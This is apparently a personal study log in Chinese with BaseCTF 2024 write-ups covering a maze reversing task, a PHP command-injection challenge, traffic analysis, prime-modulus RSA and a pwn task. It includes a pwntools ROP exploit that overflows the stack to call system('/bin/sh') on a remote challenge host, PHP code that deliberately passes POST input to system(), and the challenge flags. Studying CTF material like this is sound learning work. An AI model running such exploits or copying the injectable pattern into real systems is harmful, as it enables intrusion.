1.18学习记录
re
basectf2024 ez_maze
先查壳
发现是没壳是64位文件,用ida看看
找到主调函数,查看伪C
int __fastcall main(int argc, const char **argv, const char **envp)
{
int v3; // eax
char v5[32]; // [rsp+20h] [rbp-60h] BYREF
__int16 v6; // [rsp+40h] [rbp-40h]
char v7; // [rsp+42h] [rbp-3Eh]
int i; // [rsp+48h] [rbp-38h]
int v9; // [rsp+4Ch] [rbp-34h]
sub_401840(argc, argv, envp);
j_puts(Buffer);
j_puts(aTakeTheShortes);
j_puts(aShowYourTime);
memset(v5, 0, sizeof(v5));
v6 = 0;
v7 = 0;
j_scanf("%34s", v5);
v9 = 0;
for ( i = 0; v5[i]; ++i )
{
v3 = (unsigned __int8)v5[i];
if ( v3 == 100 )
{
if ( v9 % 15 == 14 )
goto LABEL_20;
++v9;
}
else if ( (unsigned __int8)v5[i] > 0x64u )
{
if ( v3 == 115 )
{
if ( v9 > 209 )
goto LABEL_20;
v9 += 15;
}
else
{
if ( v3 != 119 )
{
LABEL_21:
j_puts(aInvalidInput);
return -1;
}
if ( v9 <= 14 )
goto LABEL_20;
v9 -= 15;
}
}
else
{
if ( v3 != 97 )
goto LABEL_21;
if ( !(v9 % 15) )
{
LABEL_20:
j_puts(aInvalidMoveOut);
return -1;
}
--v9;
}
if ( asc_403020[v9] == 36 )
{
j_puts(aInvalidMoveHit);
return -1;
}
if ( asc_403020[v9] == 121 )
{
j_puts(aYouWin);
j_puts(aPlzBasectfLowe);
return 0;
}
}
j_puts(aYouDidnTReachT);
return 0;
首先可以看出,这里调用了指针模块,结合题目maze可以推断出这是一个迷宫问题,接着看v3的赋值,很明显这里是根据v3传入的参数执行命令,但题目中的v3都是给了数字,就很容易联想到ASCII码表,去查了一下果然是wasd
同时也从上面的代码看出迷宫起点是x终点是y,接下来在分析迷宫的大小,可以看出按下s键的时候向右移动了15格,说明迷宫的行宽是15
接下来去找迷宫
先找到了规则是要找最短路径然后md5加密,迷宫去view hex里面找形状,在通过shift+e提取出来,手搓一下外壳
从x走到y就行了,因为不是很会dfs算法,就手搓了
走出来是sssssssddddwwwddsssssssdddsssddddd,用md5加密一下
这是大佬写的解密脚本
maze = [
8, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1,
0, 1, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1,
0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1,
0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1,
0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1,
0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1,
0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1,
1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1,
1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1,
1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1,
1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1,
1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1,
1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 9
]
visited = [0] * (15 * 15) # 记录访问过的点
def BFS(maze, x, y):
queue = [(x, y, '')] # 设置队列,bfs用队列,dfs用栈
while queue:
x, y, path = queue.pop(0)
if x < 15 and y < 15 and x >= 0 and y >= 0 and visited[x * 15 + y] != 1 and maze[x * 15 + y] != 1:
visited[x * 15 + y] = 1 # 证明已经访问过了
queue.append((x + 1, y, path + 's')) # 只能字符串相加
queue.append((x, y - 1, path + 'a'))
queue.append((x, y + 1, path + 'd'))
queue.append((x - 1, y, path + 'w'))
else:
continue
if maze[x * 15 + y] == 9:
return path
flag = BFS(maze, 0, 0)
print(flag)
脚本跑出来也是这个结果
最后解得:basectf{131b7d6e60e8a34cb01801ae8de07efe}
web
basectf2024 RCEisamazingwithspace
这题是一个简单的空格绕过post传参
代码审计
<?php
highlight_file(__FILE__);
$cmd = $_POST['cmd'];
// check if space is present in the command
// use of preg_match to check if space is present in the command
if (preg_match('/\s/', $cmd)) {
echo 'Space not allowed in command';
exit;
}
// execute the command
system($cmd);
一个post传参
misc
basectf2024 海上遇到了鲨鱼
题目附件下载后是一个流量包,这题是一个流量包分析题,先分析追踪流
在tcp流中没找到flag
在http追踪流中就发现了
用脚本倒序过来
s="}67bf613763ca-50b3-4437-7a3a-b683fe51{FTCesaB"#输入需要镜像的字符
reseved_s=s[::-1]
print(reseved_s)
得flag BaseCTF{15ef386b-a3a7-7344-3b05-ac367316fb76}
crypto
basectf2024 babyrsa
rsa加解密
from Crypto.Util.number import *
flag=b'BaseCTF{}'
m=bytes_to_long(flag)
n=getPrime(1024)
e=65537
c=pow(m,e,n)
print("n =",n)
print("e =",e)
print("c =",c)
"""
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
"""
exp:
from Crypto.Util.number import *
import gmpy2
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
phin = n-1
d = gmpy2.invert(e, phin)
m = pow(c, d, n)
print(long_to_bytes(m))
pwn
basectf2024 我把她丢了
查壳
放到ida看一下
找到主调函数,发现在read处存在栈溢出
因为是64位文件,需要找寄存器
找一下bin/sh的地址
exp:
from pwn import *
io=process('./pwn')
io=remote("gz.imxbt.cn",20389)
elf=ELF('./pwn')
pop_rdi=0x401196
binsh=0x402008
ret=0x40101a
shell=elf.plt['system']
payload=b'a'*(0x70+8)+p64(pop_rdi)+p64(binsh)+p64(ret)+p64(shell)
io.recv()
io.sendline(payload)
io.interactive()